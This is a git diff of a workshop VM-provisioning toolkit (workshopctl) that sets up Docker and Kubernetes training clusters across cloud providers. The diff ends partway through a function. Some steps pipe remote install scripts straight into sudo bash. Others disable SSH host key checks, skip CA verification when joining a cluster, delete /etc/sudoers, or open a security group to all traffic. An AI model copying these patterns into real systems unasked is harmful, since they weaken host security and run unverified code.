These require Python 3. If you are on a Mac, see below for specific instructions on setting up
|
||||
Python 3 to be the default Python on a Mac. In particular, if you installed `mosh`, Homebrew
|
||||
may have changed your default Python to Python 2.
|
||||
|
||||
## General Workflow
|
||||
|
||||
@@ -84,29 +95,18 @@ You're all set!
|
||||
|
||||
## `./workshopctl` Usage
|
||||
|
||||
If you run `./workshopctl` without arguments, it will show a list of
|
||||
available commands, looking like this:
|
||||
|
||||
```
|
||||
workshopctl - the orchestration workshop swiss army knife
|
||||
Commands:
|
||||
ami Show the AMI that will be used for deployment
|
||||
amis List Ubuntu AMIs in the current region
|
||||
build Build the Docker image to run this program in a container
|
||||
cards Generate ready-to-print cards for a group of VMs
|
||||
deploy Install Docker on a bunch of running VMs
|
||||
ec2quotas Check our EC2 quotas (max instances)
|
||||
help Show available commands
|
||||
ids List the instance IDs belonging to a given tag or token
|
||||
ips List the IP addresses of the VMs for a given tag or token
|
||||
kube Setup kubernetes clusters with kubeadm (must be run AFTER deploy)
|
||||
kubetest Check that all notes are reporting as Ready
|
||||
list List available groups in the current region
|
||||
opensg Open the default security group to ALL ingress traffic
|
||||
pull_images Pre-pull a bunch of Docker images
|
||||
retag Apply a new tag to a group of VMs
|
||||
start Start a group of VMs
|
||||
status List instance status for a given group
|
||||
stop Stop (terminate, shutdown, kill, remove, destroy...) instances
|
||||
test Run tests (pre-flight checks) on a group of VMs
|
||||
wrap Run this program in a container
|
||||
build Build the Docker image to run this program in a container
|
||||
cards Generate ready-to-print cards for a group of VMs
|
||||
deploy Install Docker on a bunch of running VMs
|
||||
disableaddrchecks Disable source/destination IP address checks
|
||||
disabledocker Stop Docker Engine and don't restart it automatically
|
||||
...
|
||||
```
|
||||
|
||||
### Summary of What `./workshopctl` Does For You
|
||||
@@ -121,7 +121,8 @@ wrap Run this program in a container
|
||||
|
||||
### Example Steps to Launch a group of AWS Instances for a Workshop
|
||||
|
||||
- Run `./workshopctl start --infra infra/aws-us-east-2 --settings/myworkshop.yaml --count 60` to create 60 EC2 instances
|
||||
- Run `./workshopctl start --infra infra/aws-us-east-2 --settings/myworkshop.yaml --students 50` to create 50 clusters
|
||||
- The number of instances will be `students × clustersize`
|
||||
- Your local SSH key will be synced to instances under `ubuntu` user
|
||||
- AWS instances will be created and tagged based on date, and IP's stored in `prepare-vms/tags/`
|
||||
- Run `./workshopctl deploy TAG` to run `lib/postprep.py` via parallel-ssh
|
||||
@@ -231,12 +232,19 @@ If you don't have `wkhtmltopdf` installed, you will get a warning that it is a m
|
||||
|
||||
#### List tags
|
||||
|
||||
$ ./workshopctl list infra/some-infra-file
|
||||
|
||||
$ ./workshopctl listall
|
||||
|
||||
$ ./workshopctl tags
|
||||
|
||||
$ ./workshopctl inventory infra/some-infra-file
|
||||
|
||||
$ ./workshopctl inventory
|
||||
|
||||
Note: the `tags` command will show only the VMs that you have provisioned
|
||||
and deployed on the current machine (i.e. listed in the `tags` subdirectory).
|
||||
The `inventory` command will try to list all existing VMs (including the
|
||||
ones not listed in the `tags` directory, and including VMs provisioned
|
||||
through other mechanisms). It is not supported across all platforms,
|
||||
however.
|
||||
|
||||
#### Stop and destroy VMs
|
||||
|
||||
$ ./workshopctl stop TAG
|
||||
@@ -245,3 +253,32 @@ If you don't have `wkhtmltopdf` installed, you will get a warning that it is a m
|
||||
|
||||
- Don't write to bash history in system() in postprep
|
||||
- compose, etc version inconsistent (int vs str)
|
||||
|
||||
## Making sure Python3 is the default (Mac only)
|
||||
|
||||
Check the `/usr/local/bin/python` symlink. It should be pointing to
|
||||
`/usr/local/Cellar/python/3`-something. If it isn't, follow these
|
||||
instructions.
|
||||
|
||||
1) Verify that Python 3 is installed.
|
||||
|
||||
```
|
||||
ls -la /usr/local/Cellar/Python
|
||||
```
|
||||
|
||||
You should see one or more versions of Python 3. If you don't,
|
||||
install it with `brew install python`.
|
||||
|
||||
2) Verify that `python` points to Python3.
|
||||
|
||||
```
|
||||
ls -la /usr/local/bin/python
|
||||
```
|
||||
|
||||
If this points to `/usr/local/Cellar/python@2`, then we'll need to change it.
|
||||
|
||||
```
|
||||
rm /usr/local/bin/python
|
||||
ln -s /usr/local/Cellar/Python/xxxx /usr/local/bin/python
|
||||
# where xxxx is the most recent Python 3 version you saw above
|
||||
```
|
||||
|
||||
10
prepare-vms/e2e.sh
Executable file
10
prepare-vms/e2e.sh
Executable file
@@ -0,0 +1,10 @@
|
||||
#!/bin/sh
|
||||
set -e
|
||||
TAG=$(./workshopctl maketag)
|
||||
./workshopctl start --settings settings/jerome.yaml --infra infra/aws-eu-central-1 --tag $TAG
|
||||
./workshopctl deploy $TAG
|
||||
./workshopctl kube $TAG
|
||||
./workshopctl helmprom $TAG
|
||||
while ! ./workshopctl kubetest $TAG; do sleep 1; done
|
||||
./workshopctl tmux $TAG
|
||||
echo ./workshopctl stop $TAG
|
||||
24
prepare-vms/infra/example.openstack-cli
Normal file
24
prepare-vms/infra/example.openstack-cli
Normal file
@@ -0,0 +1,24 @@
|
||||
INFRACLASS=openstack-cli
|
||||
|
||||
# Copy that file to e.g. openstack or ovh, then customize it.
|
||||
# Some Openstack providers (like OVHcloud) will let you download
|
||||
# a file containing credentials. That's what you need to use.
|
||||
# The file below contains some example values.
|
||||
export OS_AUTH_URL=https://auth.cloud.ovh.net/v3/
|
||||
export OS_IDENTITY_API_VERSION=3
|
||||
export OS_USER_DOMAIN_NAME=${OS_USER_DOMAIN_NAME:-"Default"}
|
||||
export OS_PROJECT_DOMAIN_NAME=${OS_PROJECT_DOMAIN_NAME:-"Default"}
|
||||
export OS_TENANT_ID=abcd1234
|
||||
export OS_TENANT_NAME="0123456"
|
||||
export OS_USERNAME="user-xyz123"
|
||||
export OS_PASSWORD=AbCd1234
|
||||
export OS_REGION_NAME="GRA7"
|
||||
|
||||
# And then some values to indicate server type, image, etc.
|
||||
# You can see available flavors with `openstack flavor list`
|
||||
export OS_FLAVOR=s1-4
|
||||
# You can see available images with `openstack image list`
|
||||
export OS_IMAGE=896c5f54-51dc-44f0-8c22-ce99ba7164df
|
||||
# You can create a key with `openstack keypair create --public-key ~/.ssh/id_rsa.pub containertraining`
|
||||
export OS_KEY=containertraining
|
||||
|
||||
@@ -1,4 +1,5 @@
|
||||
INFRACLASS=openstack
|
||||
INFRACLASS=openstack-tf
|
||||
|
||||
# If you are using OpenStack, copy this file (e.g. to "openstack" or "enix")
|
||||
# and customize the variables below.
|
||||
export TF_VAR_user="jpetazzo"
|
||||
@@ -6,4 +7,5 @@ export TF_VAR_tenant="training"
|
||||
export TF_VAR_domain="Default"
|
||||
export TF_VAR_password="..."
|
||||
export TF_VAR_auth_url="https://api.r1.nxs.enix.io/v3"
|
||||
export TF_VAR_flavor="GP1.S"
|
||||
export TF_VAR_flavor="GP1.S"
|
||||
export TF_VAR_image="Ubuntu 18.04"
|
||||
5
prepare-vms/infra/hetzner
Normal file
5
prepare-vms/infra/hetzner
Normal file
@@ -0,0 +1,5 @@
|
||||
INFRACLASS=hetzner
|
||||
if ! [ -f ~/.config/hcloud/cli.toml ]; then
|
||||
warning "~/.config/hcloud/cli.toml not found."
|
||||
warning "Make sure that the Hetzner CLI (hcloud) is installed and configured."
|
||||
fi
|
||||
3
prepare-vms/infra/scaleway
Normal file
3
prepare-vms/infra/scaleway
Normal file
@@ -0,0 +1,3 @@
|
||||
INFRACLASS=scaleway
|
||||
#SCW_INSTANCE_TYPE=DEV1-L
|
||||
#SCW_ZONE=fr-par-2
|
||||
@@ -66,7 +66,7 @@ need_infra() {
|
||||
|
||||
need_tag() {
|
||||
if [ -z "$TAG" ]; then
|
||||
die "Please specify a tag or token. To see available tags and tokens, run: $0 list"
|
||||
die "Please specify a tag. To see available tags, run: $0 tags"
|
||||
fi
|
||||
if [ ! -d "tags/$TAG" ]; then
|
||||
die "Tag $TAG not found (directory tags/$TAG does not exist)."
|
||||
|
||||
@@ -1,8 +1,12 @@
|
||||
export AWS_DEFAULT_OUTPUT=text
|
||||
|
||||
# Ignore SSH key validation when connecting to these remote hosts.
|
||||
# (Otherwise, deployment scripts break when a VM IP address reuse.)
|
||||
SSHOPTS="-o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o LogLevel=ERROR"
|
||||
|
||||
HELP=""
|
||||
_cmd() {
|
||||
HELP="$(printf "%s\n%-12s %s\n" "$HELP" "$1" "$2")"
|
||||
HELP="$(printf "%s\n%-20s %s\n" "$HELP" "$1" "$2")"
|
||||
}
|
||||
|
||||
_cmd help "Show available commands"
|
||||
@@ -33,9 +37,24 @@ _cmd_cards() {
|
||||
../../lib/ips-txt-to-html.py settings.yaml
|
||||
)
|
||||
|
||||
ln -sf ../tags/$TAG/ips.html www/$TAG.html
|
||||
ln -sf ../tags/$TAG/ips.pdf www/$TAG.pdf
|
||||
|
||||
info "Cards created. You can view them with:"
|
||||
info "xdg-open tags/$TAG/ips.html tags/$TAG/ips.pdf (on Linux)"
|
||||
info "open tags/$TAG/ips.html (on macOS)"
|
||||
info "Or you can start a web server with:"
|
||||
info "$0 www"
|
||||
}
|
||||
|
||||
_cmd clean "Remove information about stopped clusters"
|
||||
_cmd_clean() {
|
||||
for TAG in tags/*; do
|
||||
if grep -q ^stopped$ "$TAG/status"; then
|
||||
info "Removing $TAG..."
|
||||
rm -rf "$TAG"
|
||||
fi
|
||||
done
|
||||
}
|
||||
|
||||
_cmd deploy "Install Docker on a bunch of running VMs"
|
||||
@@ -54,11 +73,35 @@ _cmd_deploy() {
|
||||
echo deploying > tags/$TAG/status
|
||||
sep "Deploying tag $TAG"
|
||||
|
||||
# Wait for cloudinit to be done
|
||||
# If this VM image is using cloud-init,
|
||||
# wait for cloud-init to be done
|
||||
pssh "
|
||||
while [ ! -f /var/lib/cloud/instance/boot-finished ]; do
|
||||
sleep 1
|
||||
done"
|
||||
if [ -d /var/lib/cloud ]; then
|
||||
while [ ! -f /var/lib/cloud/instance/boot-finished ]; do
|
||||
sleep 1
|
||||
done
|
||||
fi"
|
||||
|
||||
# Special case for scaleway since it doesn't come with sudo
|
||||
if [ "$INFRACLASS" = "scaleway" ]; then
|
||||
pssh -l root "
|
||||
grep DEBIAN_FRONTEND /etc/environment || echo DEBIAN_FRONTEND=noninteractive >> /etc/environment
|
||||
grep cloud-init /etc/sudoers && rm /etc/sudoers
|
||||
apt-get update && apt-get install sudo -y"
|
||||
fi
|
||||
|
||||
# FIXME
|
||||
# Special case for hetzner since it doesn't have an ubuntu user
|
||||
#if [ "$INFRACLASS" = "hetzner" ]; then
|
||||
# pssh -l root "
|
||||
#[ -d /home/ubuntu ] ||
|
||||
# useradd ubuntu -m -s /bin/bash
|
||||
#echo 'ubuntu ALL=(ALL:ALL) NOPASSWD:ALL' > /etc/sudoers.d/ubuntu
|
||||
#[ -d /home/ubuntu/.ssh ] ||
|
||||
# install --owner=ubuntu --mode=700 --directory /home/ubuntu/.ssh
|
||||
#[ -f /home/ubuntu/.ssh/authorized_keys ] ||
|
||||
# install --owner=ubuntu --mode=600 /root/.ssh/authorized_keys --target-directory /home/ubuntu/.ssh"
|
||||
#fi
|
||||
|
||||
# Copy settings and install Python YAML parser
|
||||
pssh -I tee /tmp/settings.yaml <tags/$TAG/settings.yaml
|
||||
@@ -66,6 +109,12 @@ _cmd_deploy() {
|
||||
sudo apt-get update &&
|
||||
sudo apt-get install -y python-yaml"
|
||||
|
||||
# If there is no "python" binary, symlink to python3
|
||||
#pssh "
|
||||
#if ! which python; then
|
||||
# ln -s $(which python3) /usr/local/bin/python
|
||||
#fi"
|
||||
|
||||
# Copy postprep.py to the remote machines, and execute it, feeding it the list of IP addresses
|
||||
pssh -I tee /tmp/postprep.py <lib/postprep.py
|
||||
pssh --timeout 900 --send-input "python /tmp/postprep.py >>/tmp/pp.out 2>>/tmp/pp.err" <tags/$TAG/ips.txt
|
||||
@@ -74,10 +123,10 @@ _cmd_deploy() {
|
||||
pssh -I sudo tee /usr/local/bin/docker-prompt <lib/docker-prompt
|
||||
pssh sudo chmod +x /usr/local/bin/docker-prompt
|
||||
|
||||
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from node1
|
||||
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from the first node
|
||||
pssh "
|
||||
sudo -u docker [ -f /home/docker/.ssh/id_rsa ] ||
|
||||
ssh -o StrictHostKeyChecking=no node1 sudo -u docker tar -C /home/docker -cvf- .ssh |
|
||||
ssh $SSHOPTS \$(cat /etc/name_of_first_node) sudo -u docker tar -C /home/docker -cvf- .ssh |
|
||||
sudo -u docker tar -C /home/docker -xf-"
|
||||
|
||||
# if 'docker@' doesn't appear in /home/docker/.ssh/authorized_keys, copy it there
|
||||
@@ -86,11 +135,11 @@ _cmd_deploy() {
|
||||
cat /home/docker/.ssh/id_rsa.pub |
|
||||
sudo -u docker tee -a /home/docker/.ssh/authorized_keys"
|
||||
|
||||
# On node1, create and deploy TLS certs using Docker Machine
|
||||
# On the first node, create and deploy TLS certs using Docker Machine
|
||||
# (Currently disabled.)
|
||||
true || pssh "
|
||||
if grep -q node1 /tmp/node; then
|
||||
grep ' node' /etc/hosts |
|
||||
if i_am_first_node; then
|
||||
grep '[0-9]\$' /etc/hosts |
|
||||
xargs -n2 sudo -H -u docker \
|
||||
docker-machine create -d generic --generic-ssh-user docker --generic-ip-address
|
||||
fi"
|
||||
@@ -103,32 +152,45 @@ _cmd_deploy() {
|
||||
info "$0 cards $TAG"
|
||||
}
|
||||
|
||||
_cmd disabledocker "Stop Docker Engine and don't restart it automatically"
|
||||
_cmd_disabledocker() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
pssh "
|
||||
sudo systemctl disable docker.service
|
||||
sudo systemctl disable docker.socket
|
||||
sudo systemctl stop docker
|
||||
sudo killall containerd
|
||||
"
|
||||
}
|
||||
|
||||
_cmd kubebins "Install Kubernetes and CNI binaries but don't start anything"
|
||||
_cmd_kubebins() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
##VERSION##
|
||||
ETCD_VERSION=v3.4.13
|
||||
K8SBIN_VERSION=v1.19.11 # Can't go to 1.20 because it requires a serviceaccount signing key.
|
||||
CNI_VERSION=v0.8.7
|
||||
pssh --timeout 300 "
|
||||
set -e
|
||||
cd /usr/local/bin
|
||||
if ! [ -x etcd ]; then
|
||||
curl -L https://github.com/etcd-io/etcd/releases/download/v3.3.10/etcd-v3.3.10-linux-amd64.tar.gz \
|
||||
curl -L https://github.com/etcd-io/etcd/releases/download/$ETCD_VERSION/etcd-$ETCD_VERSION-linux-amd64.tar.gz \
|
||||
| sudo tar --strip-components=1 --wildcards -zx '*/etcd' '*/etcdctl'
|
||||
fi
|
||||
if ! [ -x hyperkube ]; then
|
||||
curl -L https://dl.k8s.io/v1.14.0/kubernetes-server-linux-amd64.tar.gz \
|
||||
| sudo tar --strip-components=3 -zx kubernetes/server/bin/hyperkube
|
||||
fi
|
||||
if ! [ -x kubelet ]; then
|
||||
for BINARY in kubectl kube-apiserver kube-scheduler kube-controller-manager kubelet kube-proxy;
|
||||
do
|
||||
sudo ln -s hyperkube \$BINARY
|
||||
done
|
||||
##VERSION##
|
||||
curl -L https://dl.k8s.io/$K8SBIN_VERSION/kubernetes-server-linux-amd64.tar.gz \
|
||||
| sudo tar --strip-components=3 -zx \
|
||||
kubernetes/server/bin/kube{ctl,let,-proxy,-apiserver,-scheduler,-controller-manager}
|
||||
fi
|
||||
sudo mkdir -p /opt/cni/bin
|
||||
cd /opt/cni/bin
|
||||
if ! [ -x bridge ]; then
|
||||
curl -L https://github.com/containernetworking/plugins/releases/download/v0.7.5/cni-plugins-amd64-v0.7.5.tgz \
|
||||
curl -L https://github.com/containernetworking/plugins/releases/download/$CNI_VERSION/cni-plugins-linux-amd64-$CNI_VERSION.tgz \
|
||||
| sudo tar -zx
|
||||
fi
|
||||
"
|
||||
@@ -139,6 +201,16 @@ _cmd_kube() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
# Optional version, e.g. 1.13.5
|
||||
KUBEVERSION=$2
|
||||
if [ "$KUBEVERSION" ]; then
|
||||
EXTRA_APTGET="=$KUBEVERSION-00"
|
||||
EXTRA_KUBEADM="kubernetesVersion: v$KUBEVERSION"
|
||||
else
|
||||
EXTRA_APTGET=""
|
||||
EXTRA_KUBEADM=""
|
||||
fi
|
||||
|
||||
# Install packages
|
||||
pssh --timeout 200 "
|
||||
curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg |
|
||||
@@ -147,19 +219,45 @@ _cmd_kube() {
|
||||
sudo tee /etc/apt/sources.list.d/kubernetes.list"
|
||||
pssh --timeout 200 "
|
||||
sudo apt-get update -q &&
|
||||
sudo apt-get install -qy kubelet kubeadm kubectl &&
|
||||
kubectl completion bash | sudo tee /etc/bash_completion.d/kubectl"
|
||||
sudo apt-get install -qy kubelet$EXTRA_APTGET kubeadm$EXTRA_APTGET kubectl$EXTRA_APTGET &&
|
||||
kubectl completion bash | sudo tee /etc/bash_completion.d/kubectl &&
|
||||
echo 'alias k=kubectl' | sudo tee /etc/bash_completion.d/k &&
|
||||
echo 'complete -F __start_kubectl k' | sudo tee -a /etc/bash_completion.d/k"
|
||||
|
||||
# Initialize kube master
|
||||
# Disable swap
|
||||
# (note that this won't survive across node reboots!)
|
||||
if [ "$INFRACLASS" = "linode" ]; then
|
||||
pssh "
|
||||
sudo swapoff -a"
|
||||
fi
|
||||
|
||||
# Initialize kube control plane
|
||||
pssh --timeout 200 "
|
||||
if grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/admin.conf ]; then
|
||||
if i_am_first_node && [ ! -f /etc/kubernetes/admin.conf ]; then
|
||||
kubeadm token generate > /tmp/token &&
|
||||
sudo kubeadm init --token \$(cat /tmp/token) --apiserver-cert-extra-sans \$(cat /tmp/ipv4)
|
||||
cat >/tmp/kubeadm-config.yaml <<EOF
|
||||
kind: InitConfiguration
|
||||
apiVersion: kubeadm.k8s.io/v1beta2
|
||||
bootstrapTokens:
|
||||
- token: \$(cat /tmp/token)
|
||||
---
|
||||
kind: KubeletConfiguration
|
||||
apiVersion: kubelet.config.k8s.io/v1beta1
|
||||
cgroupDriver: cgroupfs
|
||||
---
|
||||
kind: ClusterConfiguration
|
||||
apiVersion: kubeadm.k8s.io/v1beta2
|
||||
apiServer:
|
||||
certSANs:
|
||||
- \$(cat /tmp/ipv4)
|
||||
$EXTRA_KUBEADM
|
||||
EOF
|
||||
sudo kubeadm init --config=/tmp/kubeadm-config.yaml --ignore-preflight-errors=NumCPU
|
||||
fi"
|
||||
|
||||
# Put kubeconfig in ubuntu's and docker's accounts
|
||||
pssh "
|
||||
if grep -q node1 /tmp/node; then
|
||||
if i_am_first_node; then
|
||||
sudo mkdir -p \$HOME/.kube /home/docker/.kube &&
|
||||
sudo cp /etc/kubernetes/admin.conf \$HOME/.kube/config &&
|
||||
sudo cp /etc/kubernetes/admin.conf /home/docker/.kube/config &&
|
||||
@@ -169,34 +267,41 @@ _cmd_kube() {
|
||||
|
||||
# Install weave as the pod network
|
||||
pssh "
|
||||
if grep -q node1 /tmp/node; then
|
||||
if i_am_first_node; then
|
||||
kubever=\$(kubectl version | base64 | tr -d '\n') &&
|
||||
kubectl apply -f https://cloud.weave.works/k8s/net?k8s-version=\$kubever
|
||||
fi"
|
||||
|
||||
# Join the other nodes to the cluster
|
||||
pssh --timeout 200 "
|
||||
if ! grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
|
||||
TOKEN=\$(ssh -o StrictHostKeyChecking=no node1 cat /tmp/token) &&
|
||||
sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN node1:6443
|
||||
if ! i_am_first_node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
|
||||
FIRSTNODE=\$(cat /etc/name_of_first_node) &&
|
||||
TOKEN=\$(ssh $SSHOPTS \$FIRSTNODE cat /tmp/token) &&
|
||||
sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN \$FIRSTNODE:6443
|
||||
fi"
|
||||
|
||||
# Install metrics server
|
||||
pssh "
|
||||
if grep -q node1 /tmp/node; then
|
||||
if i_am_first_node; then
|
||||
kubectl apply -f https://raw.githubusercontent.com/jpetazzo/container.training/master/k8s/metrics-server.yaml
|
||||
fi"
|
||||
}
|
||||
|
||||
_cmd kubetools "Install a bunch of CLI tools for Kubernetes"
|
||||
_cmd_kubetools() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
# Install kubectx and kubens
|
||||
pssh "
|
||||
[ -d kubectx ] || git clone https://github.com/ahmetb/kubectx &&
|
||||
sudo ln -sf /home/ubuntu/kubectx/kubectx /usr/local/bin/kctx &&
|
||||
sudo ln -sf /home/ubuntu/kubectx/kubens /usr/local/bin/kns &&
|
||||
sudo cp /home/ubuntu/kubectx/completion/*.bash /etc/bash_completion.d &&
|
||||
sudo ln -sf \$HOME/kubectx/kubectx /usr/local/bin/kctx &&
|
||||
sudo ln -sf \$HOME/kubectx/kubens /usr/local/bin/kns &&
|
||||
sudo cp \$HOME/kubectx/completion/*.bash /etc/bash_completion.d &&
|
||||
[ -d kube-ps1 ] || git clone https://github.com/jonmosco/kube-ps1 &&
|
||||
sudo -u docker sed -i s/docker-prompt/kube_ps1/ /home/docker/.bashrc &&
|
||||
sudo -u docker tee -a /home/docker/.bashrc <<EOF
|
||||
. /home/ubuntu/kube-ps1/kube-ps1.sh
|
||||
. \$HOME/kube-ps1/kube-ps1.sh
|
||||
KUBE_PS1_PREFIX=""
|
||||
KUBE_PS1_SUFFIX=""
|
||||
KUBE_PS1_SYMBOL_ENABLE="false"
|
||||
@@ -208,7 +313,7 @@ EOF"
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/stern ]; then
|
||||
##VERSION##
|
||||
sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.10.0/stern_linux_amd64 &&
|
||||
sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.11.0/stern_linux_amd64 &&
|
||||
sudo chmod +x /usr/local/bin/stern &&
|
||||
stern --completion bash | sudo tee /etc/bash_completion.d/stern
|
||||
fi"
|
||||
@@ -216,11 +321,89 @@ EOF"
|
||||
# Install helm
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/helm ]; then
|
||||
curl https://raw.githubusercontent.com/kubernetes/helm/master/scripts/get | sudo bash &&
|
||||
curl https://raw.githubusercontent.com/kubernetes/helm/master/scripts/get-helm-3 | sudo bash &&
|
||||
helm completion bash | sudo tee /etc/bash_completion.d/helm
|
||||
fi"
|
||||
|
||||
sep "Done"
|
||||
# Install kustomize
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/kustomize ]; then
|
||||
##VERSION##
|
||||
curl -L https://github.com/kubernetes-sigs/kustomize/releases/download/kustomize/v3.6.1/kustomize_v3.6.1_linux_amd64.tar.gz |
|
||||
sudo tar -C /usr/local/bin -zx kustomize
|
||||
echo complete -C /usr/local/bin/kustomize kustomize | sudo tee /etc/bash_completion.d/kustomize
|
||||
fi"
|
||||
|
||||
# Install ship
|
||||
# Note: 0.51.3 is the last version that doesn't display GIN-debug messages
|
||||
# (don't want to get folks confused by that!)
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/ship ]; then
|
||||
##VERSION##
|
||||
curl -L https://github.com/replicatedhq/ship/releases/download/v0.51.3/ship_0.51.3_linux_amd64.tar.gz |
|
||||
sudo tar -C /usr/local/bin -zx ship
|
||||
fi"
|
||||
|
||||
# Install the AWS IAM authenticator
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/aws-iam-authenticator ]; then
|
||||
##VERSION##
|
||||
sudo curl -o /usr/local/bin/aws-iam-authenticator https://amazon-eks.s3-us-west-2.amazonaws.com/1.12.7/2019-03-27/bin/linux/amd64/aws-iam-authenticator
|
||||
sudo chmod +x /usr/local/bin/aws-iam-authenticator
|
||||
fi"
|
||||
|
||||
# Install the krew package manager
|
||||
pssh "
|
||||
if [ ! -d /home/docker/.krew ]; then
|
||||
cd /tmp &&
|
||||
curl -fsSL https://github.com/kubernetes-sigs/krew/releases/latest/download/krew.tar.gz |
|
||||
tar -zxf- &&
|
||||
sudo -u docker -H ./krew-linux_amd64 install krew &&
|
||||
echo export PATH=/home/docker/.krew/bin:\\\$PATH | sudo -u docker tee -a /home/docker/.bashrc
|
||||
fi"
|
||||
|
||||
# Install k9s
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/k9s ]; then
|
||||
VERSION=v0.24.10 &&
|
||||
FILENAME=k9s_\${VERSION}_\$(uname -s)_\$(uname -m).tar.gz &&
|
||||
curl -sSL https://github.com/derailed/k9s/releases/download/\$VERSION/\$FILENAME |
|
||||
sudo tar -zxvf- -C /usr/local/bin k9s
|
||||
fi"
|
||||
|
||||
# Install popeye
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/popeye ]; then
|
||||
FILENAME=popeye_\$(uname -s)_\$(uname -m).tar.gz &&
|
||||
curl -sSL https://github.com/derailed/popeye/releases/latest/download/\$FILENAME |
|
||||
sudo tar -zxvf- -C /usr/local/bin popeye
|
||||
fi"
|
||||
|
||||
# Install Tilt
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/tilt ]; then
|
||||
curl -fsSL https://raw.githubusercontent.com/tilt-dev/tilt/master/scripts/install.sh | bash
|
||||
fi"
|
||||
|
||||
# Install Skaffold
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/skaffold ]; then
|
||||
curl -Lo skaffold https://storage.googleapis.com/skaffold/releases/latest/skaffold-linux-amd64 &&
|
||||
sudo install skaffold /usr/local/bin/
|
||||
fi"
|
||||
|
||||
# Install Kompose
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/kompose ]; then
|
||||
curl -Lo kompose https://github.com/kubernetes/kompose/releases/latest/download/kompose-linux-amd64 &&
|
||||
sudo install kompose /usr/local/bin
|
||||
fi"
|
||||
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/kubeseal ]; then
|
||||
curl -Lo kubeseal https://github.com/bitnami-labs/sealed-secrets/releases/download/v0.13.1/kubeseal-linux-amd64 &&
|
||||
sudo install kubeseal /usr/local/bin
|
||||
fi"
|
||||
}
|
||||
|
||||
_cmd kubereset "Wipe out Kubernetes configuration on all nodes"
|
||||
@@ -240,47 +423,63 @@ _cmd_kubetest() {
|
||||
# Feel free to make that better ♥
|
||||
pssh "
|
||||
set -e
|
||||
[ -f /tmp/node ]
|
||||
if grep -q node1 /tmp/node; then
|
||||
if i_am_first_node; then
|
||||
which kubectl
|
||||
for NODE in \$(awk /\ node/\ {print\ \\\$2} /etc/hosts); do
|
||||
for NODE in \$(grep [0-9]\$ /etc/hosts | grep -v ^127 | awk {print\ \\\$2}); do
|
||||
echo \$NODE ; kubectl get nodes | grep -w \$NODE | grep -w Ready
|
||||
done
|
||||
fi"
|
||||
}
|
||||
|
||||
_cmd ids "(FIXME) List the instance IDs belonging to a given tag or token"
|
||||
_cmd_ids() {
|
||||
_cmd ips "Show the IP addresses for a given tag"
|
||||
_cmd_ips() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
|
||||
info "Looking up by tag:"
|
||||
aws_get_instance_ids_by_tag $TAG
|
||||
|
||||
# Just in case we managed to create instances but weren't able to tag them
|
||||
info "Looking up by token:"
|
||||
aws_get_instance_ids_by_client_token $TAG
|
||||
SETTINGS=tags/$TAG/settings.yaml
|
||||
CLUSTERSIZE=$(awk '/^clustersize:/ {print $2}' $SETTINGS)
|
||||
while true; do
|
||||
for I in $(seq $CLUSTERSIZE); do
|
||||
read ip || return 0
|
||||
printf "%s\t" "$ip"
|
||||
done
|
||||
printf "\n"
|
||||
done < tags/$TAG/ips.txt
|
||||
}
|
||||
|
||||
_cmd list "List available groups for a given infrastructure"
|
||||
_cmd_list() {
|
||||
need_infra $1
|
||||
infra_list
|
||||
_cmd inventory "List all VMs on a given infrastructure (or all infras if no arg given)"
|
||||
_cmd_inventory() {
|
||||
case "$1" in
|
||||
"")
|
||||
for INFRA in infra/*; do
|
||||
$0 inventory $INFRA
|
||||
done
|
||||
;;
|
||||
*/example.*)
|
||||
;;
|
||||
*)
|
||||
need_infra $1
|
||||
sep "Listing instances for $1"
|
||||
infra_list
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
_cmd listall "List VMs running on all configured infrastructures"
|
||||
_cmd_listall() {
|
||||
for infra in infra/*; do
|
||||
case $infra in
|
||||
infra/example.*)
|
||||
;;
|
||||
*)
|
||||
info "Listing infrastructure $infra:"
|
||||
need_infra $infra
|
||||
infra_list
|
||||
;;
|
||||
esac
|
||||
done
|
||||
_cmd maketag "Generate a quasi-unique tag for a group of instances"
|
||||
_cmd_maketag() {
|
||||
if [ -z $USER ]; then
|
||||
export USER=anonymous
|
||||
fi
|
||||
MS=$(($(date +%N | tr -d 0)/1000000))
|
||||
date +%Y-%m-%d-%H-%M-$MS-$USER
|
||||
}
|
||||
|
||||
_cmd ping "Ping VMs in a given tag, to check that they have network access"
|
||||
_cmd_ping() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
fping < tags/$TAG/ips.txt
|
||||
}
|
||||
|
||||
_cmd netfix "Disable GRO and run a pinger job on the VMs"
|
||||
@@ -308,6 +507,34 @@ EOF
|
||||
sudo systemctl start pinger"
|
||||
}
|
||||
|
||||
_cmd tailhist "Install history viewer on port 1088"
|
||||
_cmd_tailhist () {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
pssh "
|
||||
wget https://github.com/joewalnes/websocketd/releases/download/v0.3.0/websocketd-0.3.0_amd64.deb
|
||||
sudo dpkg -i websocketd-0.3.0_amd64.deb
|
||||
